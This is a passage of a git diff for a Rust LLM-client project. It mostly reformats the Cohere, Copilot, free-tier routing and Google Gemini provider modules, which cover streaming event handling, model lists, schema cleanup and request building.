tool_call_buffers.get_mut(&block_index) + { + buf.push_str(args_frag); + } + yield Ok(StreamEvent::InputJsonDelta { + index: block_index, + partial_json: args_frag.to_string(), + }); + } + } + } + + "content-end" | "tool-call-end" => { + // Individual block ended — nothing to emit; handled at + // message-end. + } + + "message-end" => { + // {"type":"message-end","finish_reason":"COMPLETE","delta":{"finish_reason":"COMPLETE","usage":{...}}} + let finish_reason = event + .get("delta") + .and_then(|d| d.get("finish_reason")) + .and_then(|v| v.as_str()) + .or_else(|| { + event.get("finish_reason").and_then(|v| v.as_str()) + }) + .unwrap_or("COMPLETE"); + + let stop_reason = map_finish_reason(finish_reason); + + // Close all open content blocks. + yield Ok(StreamEvent::ContentBlockStop { index: 0 }); + let mut tc_indices: Vec = + tool_call_buffers.keys().cloned().collect(); + tc_indices.sort(); + for idx in tc_indices { + yield Ok(StreamEvent::ContentBlockStop { index: idx }); + } + + let usage = event + .get("delta") + .and_then(|d| d.get("usage")) + .map(|u| parse_cohere_usage(Some(u))); + + yield Ok(StreamEvent::MessageDelta { + stop_reason: Some(stop_reason), + usage, + }); + yield Ok(StreamEvent::MessageStop); + return; + } + + other => { + debug!("Unhandled Cohere stream event type: {}", other); + } + } + } + } + + if message_started { + yield Ok(StreamEvent::MessageStop); + } + }; + + Ok(Box::pin(s)) + } + + async fn list_models(&self) -> Result, ProviderError> { + Ok(vec![ + ModelInfo { + id: ModelId::new("command-r-plus"), + provider_id: self.id.clone(), + name: "Command R+".to_string(), + context_window: 128_000, + max_output_tokens: 4_000, + }, + ModelInfo { + id: ModelId::new("command-r"), + provider_id: self.id.clone(), + name: "Command R".to_string(), + context_window: 128_000, + max_output_tokens: 4_000, + }, + ]) + } + + async fn health_check(&self) -> Result { + if self.api_key.is_empty() { + return Ok(ProviderStatus::Unavailable { + reason: "No API key configured".to_string(), + }); + } + + // Lightweight check: list models endpoint. + let resp = self + .http_client + .get("https://api.cohere.ai/v2/models") + .header("Authorization", format!("Bearer {}", self.api_key)) + .send() + .await; + + match resp { + Ok(r) if r.status().is_success() => Ok(ProviderStatus::Healthy), + Ok(r) => Ok(ProviderStatus::Unavailable { + reason: format!("models endpoint returned {}", r.status()), + }), + Err(e) => Ok(ProviderStatus::Unavailable { + reason: e.to_string(), + }), + } + } + + fn capabilities(&self) -> ProviderCapabilities { + ProviderCapabilities { + streaming: true, + tool_calling: true, + thinking: false, + image_input: false, + pdf_input: false, + audio_input: false, + video_input: false, + caching: false, + structured_output: false, + system_prompt_style: SystemPromptStyle::SystemMessage, + } + } +} diff --git a/src-rust/crates/api/src/providers/copilot.rs b/src-rust/crates/api/src/providers/copilot.rs index 117c2e3..3f6f096 100644 --- a/src-rust/crates/api/src/providers/copilot.rs +++ b/src-rust/crates/api/src/providers/copilot.rs @@ -23,7 +23,9 @@ use std::pin::Pin; use async_stream::stream; use async_trait::async_trait; use claurst_core::provider_id::{ModelId, ProviderId}; -use claurst_core::types::{ContentBlock, ImageSource, MessageContent, Role, ToolResultContent, UsageInfo}; +use claurst_core::types::{ + ContentBlock, ImageSource, MessageContent, Role, ToolResultContent, UsageInfo, +}; use futures::Stream; use serde_json::{json, Value}; use tracing::debug; @@ -33,8 +35,7 @@ use crate::provider::{LlmProvider, ModelInfo}; use crate::provider_error::ProviderError; use crate::provider_types::{ ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason, - StreamEvent, - SystemPromptStyle, + StreamEvent, SystemPromptStyle, }; use crate::providers::openai::OpenAiProvider; @@ -63,7 +64,7 @@ impl CopilotProvider { } pub fn from_env() -> Option { - std::env::var("GITHUB_TOKEN").ok().map(|t| Self::new(t)) + std::env::var("GITHUB_TOKEN").ok().map(Self::new) } fn base_url() -> &'static str { @@ -112,9 +113,10 @@ impl CopilotProvider { } fn copilot_headers(&self, builder: reqwest::RequestBuilder) -> reqwest::RequestBuilder { - builder - .bearer_auth(&self.token) - .header("User-Agent", concat!("coven-code/", env!("CARGO_PKG_VERSION"))) + builder.bearer_auth(&self.token).header( + "User-Agent", + concat!("coven-code/", env!("CARGO_PKG_VERSION")), + ) } fn copilot_request_headers( @@ -195,7 +197,10 @@ impl CopilotProvider { }; let major: String = rest.chars().take_while(|c| c.is_ascii_digit()).collect(); - major.parse::().map(|value| value >= 5).unwrap_or(false) + major + .parse::() + .map(|value| value >= 5) + .unwrap_or(false) } /// Check whether a provider error indicates the model/endpoint is @@ -205,7 +210,10 @@ impl CopilotProvider { err, ProviderError::InvalidRequest { .. } | ProviderError::ModelNotFound { .. } - | ProviderError::Other { status: Some(400..=499), .. } + | ProviderError::Other { + status: Some(400..=499), + .. + } ) } @@ -315,14 +323,15 @@ impl CopilotProvider { MessageContent::Blocks(blocks) => match &message.role { Role::User => { let mut message_parts = Vec::new(); - let flush_user_content = |input: &mut Vec, content: &mut Vec| { - if !content.is_empty() { - input.push(json!({ - "role": "user", - "content": std::mem::take(content), - })); - } - }; + let flush_user_content = + |input: &mut Vec, content: &mut Vec| { + if !content.is_empty() { + input.push(json!({ + "role": "user", + "content": std::mem::take(content), + })); + } + }; for (index, block) in blocks.iter().enumerate() { if let Some(part) = Self::user_block_to_responses_part(block, index) { message_parts.push(part); @@ -447,17 +456,83 @@ impl CopilotProvider { /// unreachable or returns empty data. fn hardcoded_models(provider_id: &ProviderId) -> Vec { vec![ - ModelInfo { id: ModelId::new("claude-sonnet-4.6"), provider_id: provider_id.clone(), name: "Claude Sonnet 4.6 (Copilot)".into(), context_window: 128_000, max_output_tokens: 32_000 }, - ModelInfo { id: ModelId::new("claude-sonnet-4.5"), provider_id: provider_id.clone(), name: "Claude Sonnet 4.5 (Copilot)".into(), context_window: 128_000, max_output_tokens: 32_000 }, - ModelInfo { id: ModelId::new("claude-haiku-4.5"), provider_id: provider_id.clone(), name: "Claude Haiku 4.5 (Copilot)".into(), context_window: 128_000, max_output_tokens: 32_000 }, - ModelInfo { id: ModelId::new("gpt-4.1"), provider_id: provider_id.clone(), name: "GPT-4.1 (Copilot)".into(), context_window: 64_000, max_output_tokens: 16_384 }, - ModelInfo { id: ModelId::new("gpt-4o"), provider_id: provider_id.clone(), name: "GPT-4o (Copilot)".into(), context_window: 128_000, max_output_tokens: 16_384 }, - ModelInfo { id: ModelId::new("gpt-4o-mini"), provider_id: provider_id.clone(), name: "GPT-4o Mini (Copilot)".into(), context_window: 128_000, max_output_tokens: 16_384 }, - ModelInfo { id: ModelId::new("gpt-5.4"), provider_id: provider_id.clone(), name: "GPT-5.4 (Copilot)".into(), context_window: 128_000, max_output_tokens: 128_000 }, - ModelInfo { id: ModelId::new("gpt-5-mini"), provider_id: provider_id.clone(), name: "GPT-5 Mini (Copilot)".into(), context_window: 128_000, max_output_tokens: 128_000 }, - ModelInfo { id: ModelId::new("o3-mini"), provider_id: provider_id.clone(), name: "o3-mini (Copilot)".into(), context_window: 200_000, max_output_tokens: 100_000 }, - ModelInfo { id: ModelId::new("o4-mini"), provider_id: provider_id.clone(), name: "o4-mini (Copilot)".into(), context_window: 200_000, max_output_tokens: 100_000 }, - ModelInfo { id: ModelId::new("gemini-3-flash-preview"), provider_id: provider_id.clone(), name: "Gemini 3 Flash (Copilot)".into(), context_window: 128_000, max_output_tokens: 64_000 }, + ModelInfo { + id: ModelId::new("claude-sonnet-4.6"), + provider_id: provider_id.clone(), + name: "Claude Sonnet 4.6 (Copilot)".into(), + context_window: 128_000, + max_output_tokens: 32_000, + }, + ModelInfo { + id: ModelId::new("claude-sonnet-4.5"), + provider_id: provider_id.clone(), + name: "Claude Sonnet 4.5 (Copilot)".into(), + context_window: 128_000, + max_output_tokens: 32_000, + }, + ModelInfo { + id: ModelId::new("claude-haiku-4.5"), + provider_id: provider_id.clone(), + name: "Claude Haiku 4.5 (Copilot)".into(), + context_window: 128_000, + max_output_tokens: 32_000, + }, + ModelInfo { + id: ModelId::new("gpt-4.1"), + provider_id: provider_id.clone(), + name: "GPT-4.1 (Copilot)".into(), + context_window: 64_000, + max_output_tokens: 16_384, + }, + ModelInfo { + id: ModelId::new("gpt-4o"), + provider_id: provider_id.clone(), + name: "GPT-4o (Copilot)".into(), + context_window: 128_000, + max_output_tokens: 16_384, + }, + ModelInfo { + id: ModelId::new("gpt-4o-mini"), + provider_id: provider_id.clone(), + name: "GPT-4o Mini (Copilot)".into(), + context_window: 128_000, + max_output_tokens: 16_384, + }, + ModelInfo { + id: ModelId::new("gpt-5.4"), + provider_id: provider_id.clone(), + name: "GPT-5.4 (Copilot)".into(), + context_window: 128_000, + max_output_tokens: 128_000, + }, + ModelInfo { + id: ModelId::new("gpt-5-mini"), + provider_id: provider_id.clone(), + name: "GPT-5 Mini (Copilot)".into(), + context_window: 128_000, + max_output_tokens: 128_000, + }, + ModelInfo { + id: ModelId::new("o3-mini"), + provider_id: provider_id.clone(), + name: "o3-mini (Copilot)".into(), + context_window: 200_000, + max_output_tokens: 100_000, + }, + ModelInfo { + id: ModelId::new("o4-mini"), + provider_id: provider_id.clone(), + name: "o4-mini (Copilot)".into(), + context_window: 200_000, + max_output_tokens: 100_000, + }, + ModelInfo { + id: ModelId::new("gemini-3-flash-preview"), + provider_id: provider_id.clone(), + name: "Gemini 3 Flash (Copilot)".into(), + context_window: 128_000, + max_output_tokens: 64_000, + }, ] } @@ -495,7 +570,9 @@ impl CopilotProvider { for part in parts { match part.get("type").and_then(|value| value.as_str()) { Some("output_text") | Some("text") => { - if let Some(text) = part.get("text").and_then(|value| value.as_str()) { + if let Some(text) = + part.get("text").and_then(|value| value.as_str()) + { if !text.is_empty() { content.push(ContentBlock::Text { text: text.to_string(), @@ -1113,7 +1190,8 @@ impl LlmProvider for CopilotProvider { // Try to fetch the live model list from the Copilot API. let url = format!("{}/models", Self::base_url()); let builder = self.http_client.get(&url); - let builder = self.copilot_headers(builder) + let builder = self + .copilot_headers(builder) .header("Accept", "application/json"); let resp = builder.send().await; @@ -1126,12 +1204,13 @@ impl LlmProvider for CopilotProvider { status: None, body: None, })?; - let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to parse models JSON: {}", e), - status: None, - body: Some(text.clone()), - })?; + let json: Value = + serde_json::from_str(&text).map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to parse models JSON: {}", e), + status: None, + body: Some(text.clone()), + })?; let mut models = Vec::new(); @@ -1144,10 +1223,7 @@ impl LlmProvider for CopilotProvider { if let Some(arr) = items { for item in arr { - if item - .get("model_picker_enabled") - .and_then(|v| v.as_bool()) - == Some(false) + if item.get("model_picker_enabled").and_then(|v| v.as_bool()) == Some(false) { continue; } @@ -1168,19 +1244,29 @@ impl LlmProvider for CopilotProvider { } } if let Some(id) = item.get("id").and_then(|v| v.as_str()) { - let name = item - .get("name") - .and_then(|v| v.as_str()) - .unwrap_or(id); + let name = item.get("name").and_then(|v| v.as_str()).unwrap_or(id); let ctx = item .get("context_window") - .or_else(|| item.get("capabilities").and_then(|c| c.get("limits").and_then(|l| l.get("max_context_window_tokens")))) - .or_else(|| item.get("capabilities").and_then(|c| c.get("limits").and_then(|l| l.get("max_prompt_tokens")))) + .or_else(|| { + item.get("capabilities").and_then(|c| { + c.get("limits") + .and_then(|l| l.get("max_context_window_tokens")) + }) + }) + .or_else(|| { + item.get("capabilities").and_then(|c| { + c.get("limits").and_then(|l| l.get("max_prompt_tokens")) + }) + }) .and_then(|v| v.as_u64()) .unwrap_or(128_000) as u32; let max_out = item .get("max_output_tokens") - .or_else(|| item.get("capabilities").and_then(|c| c.get("limits").and_then(|l| l.get("max_output_tokens")))) + .or_else(|| { + item.get("capabilities").and_then(|c| { + c.get("limits").and_then(|l| l.get("max_output_tokens")) + }) + }) .and_then(|v| v.as_u64()) .unwrap_or(16_384) as u32; models.push(ModelInfo { diff --git a/src-rust/crates/api/src/providers/free.rs b/src-rust/crates/api/src/providers/free.rs index 094dded..9f94d40 100644 --- a/src-rust/crates/api/src/providers/free.rs +++ b/src-rust/crates/api/src/providers/free.rs @@ -187,11 +187,7 @@ impl FreeProvider { /// Decide how to route a user-facing model id into the chain. fn resolve_route(&self, model: &str) -> Route { let trimmed = model.trim(); - if trimmed.is_empty() - || trimmed == "free" - || trimmed == "auto" - || trimmed == "free/auto" - { + if trimmed.is_empty() || trimmed == "free" || trimmed == "auto" || trimmed == "free/auto" { return Route::Auto; } @@ -282,8 +278,9 @@ impl LlmProvider for FreeProvider { if self.chain.is_empty() { return Err(ProviderError::AuthFailed { provider: self.id.clone(), - message: "Free mode has no configured upstreams — add at least one API key via /connect." - .to_string(), + message: + "Free mode has no configured upstreams — add at least one API key via /connect." + .to_string(), }); } @@ -321,15 +318,14 @@ impl LlmProvider for FreeProvider { async fn create_message_stream( &self, request: ProviderRequest, - ) -> Result< - Pin> + Send>>, - ProviderError, - > { + ) -> Result> + Send>>, ProviderError> + { if self.chain.is_empty() { return Err(ProviderError::AuthFailed { provider: self.id.clone(), - message: "Free mode has no configured upstreams — add at least one API key via /connect." - .to_string(), + message: + "Free mode has no configured upstreams — add at least one API key via /connect." + .to_string(), }); } @@ -381,7 +377,10 @@ impl LlmProvider for FreeProvider { )]; for entry in &self.chain { - let label = format!("{} \u{2014} {}", entry.upstream.title, entry.upstream.default_model); + let label = format!( + "{} \u{2014} {}", + entry.upstream.title, entry.upstream.default_model + ); models.push(mk( &format!("{}/{}", entry.upstream.id, entry.upstream.default_model), &label, @@ -549,7 +548,10 @@ mod tests { let provider = FreeProvider::new(vec![entry("groq", true), entry("cerebras", true)]); let route = provider.resolve_route("cerebras/qwen-3-235b"); match route { - Route::Pinned { start_idx, pinned_model } => { + Route::Pinned { + start_idx, + pinned_model, + } => { assert_eq!(start_idx, 1); assert_eq!(pinned_model, "qwen-3-235b"); } @@ -559,13 +561,14 @@ mod tests { #[test] fn legacy_zen_prefix_routes_to_opencode_zen() { - let provider = FreeProvider::new(vec![ - entry("opencode-zen", true), - entry("openrouter", true), - ]); + let provider = + FreeProvider::new(vec![entry("opencode-zen", true), entry("openrouter", true)]); let route = provider.resolve_route("zen/big-pickle"); match route { - Route::Pinned { start_idx, pinned_model } => { + Route::Pinned { + start_idx, + pinned_model, + } => { assert_eq!(start_idx, 0); assert_eq!(pinned_model, "big-pickle"); } diff --git a/src-rust/crates/api/src/providers/google.rs b/src-rust/crates/api/src/providers/google.rs index ad00d2d..6f9f1d2 100644 --- a/src-rust/crates/api/src/providers/google.rs +++ b/src-rust/crates/api/src/providers/google.rs @@ -1,1151 +1,1145 @@ -// providers/google.rs — GoogleProvider: implements LlmProvider for the -// Google Gemini API (generativelanguage.googleapis.com). -// -// Supports: -// - Non-streaming: POST .../generateContent?key={api_key} -// - Streaming SSE: POST .../streamGenerateContent?alt=sse&key={api_key} -// - Tool/function calling via functionDeclarations -// - System prompts via systemInstruction field -// - Thinking config for Gemini 2.5+ and 3.0+ models -// - Image/video inputs via inlineData parts -// - list_models via GET /v1beta/models - -use std::pin::Pin; - -use async_trait::async_trait; -use bytes::Bytes; -use claurst_core::provider_id::{ModelId, ProviderId}; -use claurst_core::types::{ContentBlock, Message, MessageContent, Role, ToolResultContent, UsageInfo}; -use futures::{Stream, StreamExt}; -use serde_json::{json, Value}; -use tracing::{debug, warn}; - -use crate::error_handling::parse_error_response as parse_http_error; -use crate::provider::{LlmProvider, ModelInfo}; -use crate::provider_error::ProviderError; -use crate::provider_types::{ - ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason, - StreamEvent, SystemPrompt, SystemPromptStyle, -}; - -use super::request_options::merge_google_options; - -// --------------------------------------------------------------------------- -// GoogleProvider -// --------------------------------------------------------------------------- - -pub struct GoogleProvider { - id: ProviderId, - api_key: String, - base_url: String, - http_client: reqwest::Client, -} - -impl GoogleProvider { - pub fn new(api_key: String) -> Self { - Self { - id: ProviderId::new(ProviderId::GOOGLE), - api_key, - base_url: "https://generativelanguage.googleapis.com".to_string(), - http_client: reqwest::Client::new(), - } - } - - // ----------------------------------------------------------------------- - // Internal helpers - // ----------------------------------------------------------------------- - - /// Returns true if the model supports thinking config (Gemini 2.5+ / 3.0+). - fn supports_thinking(model: &str) -> bool { - model.contains("2.5") || model.contains("3.0") || model.contains("3.1") || model.contains("gemini-3") - } - - /// Build the full generateContent URL for non-streaming. - fn generate_url(&self, model: &str) -> String { - format!( - "{}/v1beta/models/{}:generateContent?key={}", - self.base_url, model, self.api_key - ) - } - - /// Build the full streamGenerateContent URL for streaming. - fn stream_url(&self, model: &str) -> String { - format!( - "{}/v1beta/models/{}:streamGenerateContent?alt=sse&key={}", - self.base_url, model, self.api_key - ) - } - - fn tool_use_id_for_name(name: &str, occurrence: usize) -> String { - let sanitized: String = name - .chars() - .map(|ch| { - if ch.is_ascii_alphanumeric() || ch == '_' || ch == '-' { - ch - } else { - '_' - } - }) - .collect(); - let base = if sanitized.is_empty() { "tool" } else { sanitized.as_str() }; - if occurrence == 0 { - format!("call_{}", base) - } else { - format!("call_{}_{}", base, occurrence + 1) - } - } - - fn tool_name_by_id(messages: &[Message]) -> std::collections::HashMap { - let mut map = std::collections::HashMap::new(); - for message in messages { - let MessageContent::Blocks(blocks) = &message.content else { - continue; - }; - for block in blocks { - if let ContentBlock::ToolUse { id, name, .. } = block { - map.insert(id.clone(), name.clone()); - } - } - } - map - } - - fn infer_tool_name_from_id(tool_use_id: &str) -> Option { - let raw = tool_use_id.strip_prefix("call_")?; - let trimmed = if let Some((candidate, suffix)) = raw.rsplit_once('_') { - if !candidate.is_empty() && suffix.chars().all(|ch| ch.is_ascii_digit()) { - candidate - } else { - raw - } - } else { - raw - }; - - if trimmed.is_empty() { - None - } else { - Some(trimmed.to_string()) - } - } - - /// Convert a single ContentBlock to a Gemini "part" Value. - /// Returns None for blocks that should be dropped (e.g. Thinking). - fn content_block_to_part(block: &ContentBlock) -> Option { - match block { - ContentBlock::Text { text } => Some(json!({ "text": text })), - - ContentBlock::Image { source } => { - // Prefer base64 inline data; fall back to URL if available. - if let (Some(data), Some(mime)) = (&source.data, &source.media_type) { - Some(json!({ - "inlineData": { - "data": data, - "mimeType": mime - } - })) - } else if let Some(url) = &source.url { - Some(json!({ - "fileData": { - "fileUri": url, - "mimeType": source.media_type.as_deref().unwrap_or("image/jpeg") - } - })) - } else { - None - } - } - - ContentBlock::ToolUse { name, input, .. } => Some(json!({ - "functionCall": { - "name": name, - "args": input - } - })), - - // Thinking blocks are not supported by Gemini — drop silently. - ContentBlock::Thinking { .. } | ContentBlock::RedactedThinking { .. } => None, - - // Document blocks: treat as file data when URL is available, - // otherwise as inline base64. - ContentBlock::Document { source, .. } => { - if let (Some(data), Some(mime)) = (&source.data, &source.media_type) { - Some(json!({ - "inlineData": { - "data": data, - "mimeType": mime - } - })) - } else if let Some(url) = &source.url { - Some(json!({ - "fileData": { - "fileUri": url, - "mimeType": source.media_type.as_deref().unwrap_or("application/pdf") - } - })) - } else { - None - } - } - - // Render UI-only / metadata blocks as text so context is not lost. - ContentBlock::UserLocalCommandOutput { command, output } => Some(json!({ - "text": format!("$ {}\n{}", command, output) - })), - ContentBlock::UserCommand { name, args } => Some(json!({ - "text": format!("/{} {}", name, args) - })), - ContentBlock::UserMemoryInput { key, value } => Some(json!({ - "text": format!("[memory] {}: {}", key, value) - })), - ContentBlock::SystemAPIError { message, .. } => Some(json!({ - "text": format!("[error] {}", message) - })), - ContentBlock::CollapsedReadSearch { tool_name, paths, .. } => Some(json!({ - "text": format!("[{}] {}", tool_name, paths.join(", ")) - })), - ContentBlock::TaskAssignment { id, subject, description } => Some(json!({ - "text": format!("[task:{}] {}: {}", id, subject, description) - })), - - // ToolResult is handled specially in message conversion. - ContentBlock::ToolResult { .. } => None, - } - } - - /// Convert a ToolResult block to a "functionResponse" part Value. - fn tool_result_to_part(tool_name: &str, content: &ToolResultContent) -> Value { - let response_content = match content { - ToolResultContent::Text(t) => json!({ "content": t }), - ToolResultContent::Blocks(blocks) => { - // Concatenate all text blocks for the response payload. - let text: String = blocks - .iter() - .filter_map(|b| { - if let ContentBlock::Text { text } = b { - Some(text.as_str()) - } else { - None - } - }) - .collect::>() - .join("\n"); - json!({ "content": text }) - } - }; - json!({ - "functionResponse": { - "name": tool_name, - "response": response_content - } - }) - } - - /// Sanitize a JSON Schema object for Google's stricter requirements: - /// - Integer enums → string enums - /// - `required` must only list fields actually in `properties` - /// - Non-object types must not have `properties`/`required` - /// - Array `items` must have a `type` field - fn sanitize_schema(schema: Value) -> Value { - match schema { - Value::Object(mut map) => { - // Strip keywords that Gemini's function-declaration schema does - // not understand and will reject with a 400 error. - map.remove("additionalProperties"); - map.remove("$schema"); - map.remove("default"); - map.remove("examples"); - map.remove("title"); - - // Recurse into nested schemas first. - let schema_type = map - .get("type") - .and_then(|v| v.as_str()) - .map(|s| s.to_string()); - - // Convert integer enums to string enums. - if let Some(Value::Array(enum_vals)) = map.get("enum") { - if enum_vals.iter().any(|v| v.is_number()) { - let string_enums: Vec = enum_vals - .iter() - .map(|v| Value::String(v.to_string())) - .collect(); - map.insert("enum".to_string(), Value::Array(string_enums)); - // Upgrade type to string when converting number enums. - map.insert("type".to_string(), Value::String("string".to_string())); - } - } - - // For object types: sanitize properties recursively and fix required. - if schema_type.as_deref() == Some("object") { - if let Some(Value::Object(props)) = map.get_mut("properties") { - let sanitized_props: serde_json::Map = props - .iter() - .map(|(k, v)| (k.clone(), Self::sanitize_schema(v.clone()))) - .collect(); - *props = sanitized_props; - } - - // Filter required to only include keys present in properties. - if let Some(required) = map.get("required").cloned() { - if let Value::Array(req_arr) = required { - let prop_keys: std::collections::HashSet = map - .get("properties") - .and_then(|p| p.as_object()) - .map(|o| o.keys().cloned().collect()) - .unwrap_or_default(); - - let filtered: Vec = req_arr - .into_iter() - .filter(|v| { - v.as_str() - .map(|s| prop_keys.contains(s)) - .unwrap_or(false) - }) - .collect(); - map.insert("required".to_string(), Value::Array(filtered)); - } - } - } else { - // Non-object types must not carry properties/required. - map.remove("properties"); - map.remove("required"); - } - - // Array items: ensure a type field is present. - if schema_type.as_deref() == Some("array") { - if let Some(items) = map.get_mut("items") { - if let Value::Object(ref mut items_map) = items { - if !items_map.contains_key("type") { - items_map - .insert("type".to_string(), Value::String("string".to_string())); - } - // Recurse sanitize into items. - let sanitized = Self::sanitize_schema(Value::Object(items_map.clone())); - *items = sanitized; - } - } - } - - Value::Object(map) - } - other => other, - } - } - - /// Build the full request body JSON for the Gemini API. - fn build_request_body(&self, request: &ProviderRequest) -> Value { - // ---- Convert messages ---- - // Google requires a flat list of content objects. - // ToolResult blocks must become separate user-role messages. - let mut contents: Vec = Vec::new(); - let tool_name_by_id = Self::tool_name_by_id(&request.messages); - - for msg in &request.messages { - let role = match msg.role { - Role::User => "user", - Role::Assistant => "model", - }; - - let blocks = msg.content_blocks(); - - let mut regular_parts: Vec = Vec::new(); - let mut tool_result_parts: Vec = Vec::new(); - let flush_regular_parts = |contents: &mut Vec, parts: &mut Vec| { - if !parts.is_empty() { - contents.push(json!({ - "role": role, - "parts": std::mem::take(parts) - })); - } - }; - let flush_tool_result_parts = |contents: &mut Vec, parts: &mut Vec| { - if !parts.is_empty() { - contents.push(json!({ - "role": "user", - "parts": std::mem::take(parts) - })); - } - }; - - for block in &blocks { - if let ContentBlock::ToolResult { - tool_use_id, - content, - .. - } = block - { - flush_regular_parts(&mut contents, &mut regular_parts); - let tool_name = tool_name_by_id - .get(tool_use_id) - .cloned() - .or_else(|| Self::infer_tool_name_from_id(tool_use_id)) - .unwrap_or_else(|| tool_use_id.clone()); - tool_result_parts.push(Self::tool_result_to_part(&tool_name, content)); - } else if let Some(part) = Self::content_block_to_part(block) { - flush_tool_result_parts(&mut contents, &mut tool_result_parts); - regular_parts.push(part); - } - } - - flush_regular_parts(&mut contents, &mut regular_parts); - flush_tool_result_parts(&mut contents, &mut tool_result_parts); - } - - // ---- System instruction ---- - let system_instruction: Option = request.system_prompt.as_ref().map(|sp| { - let text = match sp { - SystemPrompt::Text(t) => t.clone(), - SystemPrompt::Blocks(blocks) => blocks - .iter() - .map(|b| b.text.as_str()) - .collect::>() - .join("\n"), - }; - json!({ "parts": [{ "text": text }] }) - }); - - // ---- Tool declarations ---- - let tools_value: Option = if request.tools.is_empty() { - None - } else { - let declarations: Vec = request - .tools - .iter() - .map(|td| { - json!({ - "name": td.name, - "description": td.description, - "parameters": Self::sanitize_schema(td.input_schema.clone()) - }) - }) - .collect(); - Some(json!([{ "functionDeclarations": declarations }])) - }; - - // ---- Generation config ---- - let mut gen_config = serde_json::Map::new(); - gen_config.insert( - "maxOutputTokens".to_string(), - json!(request.max_tokens), - ); - if let Some(temp) = request.temperature { - gen_config.insert("temperature".to_string(), json!(temp)); - } - if !request.stop_sequences.is_empty() { - gen_config.insert( - "stopSequences".to_string(), - json!(request.stop_sequences), - ); - } - if let Some(top_p) = request.top_p { - gen_config.insert("topP".to_string(), json!(top_p)); - } - if let Some(top_k) = request.top_k { - gen_config.insert("topK".to_string(), json!(top_k)); - } - - // Thinking config for supported models. - if Self::supports_thinking(&request.model) && request.thinking.is_some() { - let budget = request - .thinking - .as_ref() - .map(|t| t.budget_tokens) - .unwrap_or(8192); - gen_config.insert( - "thinkingConfig".to_string(), - json!({ - "includeThoughts": true, - "thinkingBudget": budget - }), - ); - } - - // ---- Assemble body ---- - let mut body = serde_json::Map::new(); - body.insert("contents".to_string(), Value::Array(contents)); - body.insert( - "generationConfig".to_string(), - Value::Object(gen_config), - ); - if let Some(si) = system_instruction { - body.insert("systemInstruction".to_string(), si); - } - if let Some(tools) = tools_value { - body.insert("tools".to_string(), tools); - } - - let mut value = Value::Object(body); - merge_google_options(&mut value, &request.provider_options); - value - } - - /// Parse a Google error JSON body and return the appropriate ProviderError. - fn parse_error_response(&self, status: u16, body: &str) -> ProviderError { - parse_http_error(status, body, &self.id) - } - - /// Extract content blocks and usage from a completed Gemini response body. - fn parse_response_body( - &self, - body: &Value, - model: &str, - ) -> Result { - let candidates = body - .get("candidates") - .and_then(|c| c.as_array()) - .ok_or_else(|| ProviderError::Other { - provider: self.id.clone(), - message: "Missing 'candidates' in response".to_string(), - status: None, - body: Some(body.to_string()), - })?; - - let candidate = candidates.first().ok_or_else(|| ProviderError::Other { - provider: self.id.clone(), - message: "Empty 'candidates' array in response".to_string(), - status: None, - body: Some(body.to_string()), - })?; - - let finish_reason = candidate - .get("finishReason") - .and_then(|r| r.as_str()) - .unwrap_or("STOP"); - - let stop_reason = match finish_reason { - "STOP" => StopReason::EndTurn, - "MAX_TOKENS" => StopReason::MaxTokens, - "SAFETY" => StopReason::ContentFiltered, - "RECITATION" => StopReason::ContentFiltered, - "TOOL_CODE" | "FUNCTION_CALL" => StopReason::ToolUse, - other => StopReason::Other(other.to_string()), - }; - - let parts = candidate - .get("content") - .and_then(|c| c.get("parts")) - .and_then(|p| p.as_array()); - - let mut content_blocks: Vec = Vec::new(); - let mut tool_name_counts: std::collections::HashMap = - std::collections::HashMap::new(); - - if let Some(parts) = parts { - for part in parts { - if let Some(text) = part.get("text").and_then(|t| t.as_str()) { - content_blocks.push(ContentBlock::Text { - text: text.to_string(), - }); - } else if let Some(fc) = part.get("functionCall") { - let name = fc - .get("name") - .and_then(|n| n.as_str()) - .unwrap_or("") - .to_string(); - let args = fc.get("args").cloned().unwrap_or(json!({})); - let occurrence = tool_name_counts - .entry(name.clone()) - .and_modify(|count| *count += 1) - .or_insert(0); - let id = Self::tool_use_id_for_name(&name, *occurrence); - content_blocks.push(ContentBlock::ToolUse { - id, - name, - input: args, - }); - } - } - } - - // Extract usage metadata. - let usage = self.extract_usage(body); - - Ok(ProviderResponse { - id: format!("gemini-{}", uuid_v4_simple()), - content: content_blocks, - stop_reason, - usage, - model: model.to_string(), - }) - } - - /// Extract UsageInfo from a response body's usageMetadata field. - fn extract_usage(&self, body: &Value) -> UsageInfo { - let meta = body.get("usageMetadata"); - UsageInfo { - input_tokens: meta - .and_then(|m| m.get("promptTokenCount")) - .and_then(|v| v.as_u64()) - .unwrap_or(0), - output_tokens: meta - .and_then(|m| m.get("candidatesTokenCount")) - .and_then(|v| v.as_u64()) - .unwrap_or(0), - cache_creation_input_tokens: 0, - cache_read_input_tokens: 0, - } - } - -} - -// --------------------------------------------------------------------------- -// LlmProvider impl -// --------------------------------------------------------------------------- - -#[async_trait] -impl LlmProvider for GoogleProvider { - fn id(&self) -> &ProviderId { - &self.id - } - - fn name(&self) -> &str { - "Google" - } - - async fn create_message( - &self, - request: ProviderRequest, - ) -> Result { - let url = self.generate_url(&request.model); - let model = request.model.clone(); - let body = self.build_request_body(&request); - - debug!("Google create_message: POST {}", url); - - let resp = self - .http_client - .post(&url) - .header("x-goog-api-key", &self.api_key) - .header("Content-Type", "application/json") - .json(&body) - .send() - .await - .map_err(|e| ProviderError::ServerError { - provider: self.id.clone(), - status: None, - message: e.to_string(), - is_retryable: true, - })?; - - let status = resp.status().as_u16(); - let resp_body = resp.text().await.map_err(|e| ProviderError::ServerError { - provider: self.id.clone(), - status: Some(status), - message: e.to_string(), - is_retryable: true, - })?; - - if status >= 400 { - return Err(self.parse_error_response(status, &resp_body)); - } - - let json_body: Value = - serde_json::from_str(&resp_body).map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to parse response JSON: {}", e), - status: Some(status), - body: Some(resp_body.clone()), - })?; - - self.parse_response_body(&json_body, &model) - } - - async fn create_message_stream( - &self, - request: ProviderRequest, - ) -> Result< - Pin> + Send>>, - ProviderError, - > { - let url = self.stream_url(&request.model); - let model = request.model.clone(); - let body = self.build_request_body(&request); - - debug!("Google create_message_stream: POST {}", url); - - let resp = self - .http_client - .post(&url) - .header("x-goog-api-key", &self.api_key) - 